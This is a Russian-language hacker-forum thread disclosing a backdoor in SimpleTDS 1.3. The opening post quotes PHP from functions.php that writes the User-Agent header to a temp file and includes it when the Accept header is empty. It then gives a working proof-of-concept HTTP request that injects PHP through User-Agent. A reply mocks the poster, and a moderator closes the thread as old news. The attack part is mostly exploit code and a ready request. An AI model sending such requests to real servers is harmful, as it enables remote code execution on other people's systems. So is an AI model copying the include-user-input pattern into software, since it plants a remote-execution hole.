SimpleTDS 1.3 - backdoor/rce

Discussion in 'Веб-уязвимости' started by Expl0ited, 10 Oct 2013.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Официальный дистр: http://simpletds.com/download-1_3
    Уязвимый код в functions.php (205-215):
    PHP:
    {
         $accept $_SERVER['HTTP_ACCEPT'] == null true false;
     if(    $debug || $accept) { 
            $os_repository tempnam(sys_get_temp_dir(), 'OSV');
            $tmp fopen($os_repository'w');
            fwrite($tmp$_SERVER['HTTP_USER_AGENT']);
            fclose($tmp);
        include_once(    $os_repository);
            unlink($os_repository);
        }
    }
    POC:
    Code:
    GET /functions.php HTTP/1.1
Host: localhost
User-Agent: <?php phpinfo();?>
Accept: 
Connection: keep-alive
     
    _________________________
    #1 Expl0ited, 10 Oct 2013
    2 people like this.
  2. Ironmаn

    Ironmаn Banned

    Joined:
    22 Aug 2013
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    молодец! я всегда знал что ти хакир :(
     
    #2 Ironmаn, 10 Oct 2013
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Было найдено пару лет назад BECHED aka ROOT-access.

    Закрываю.
     
    _________________________
    #3 BigBear, 10 Oct 2013
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.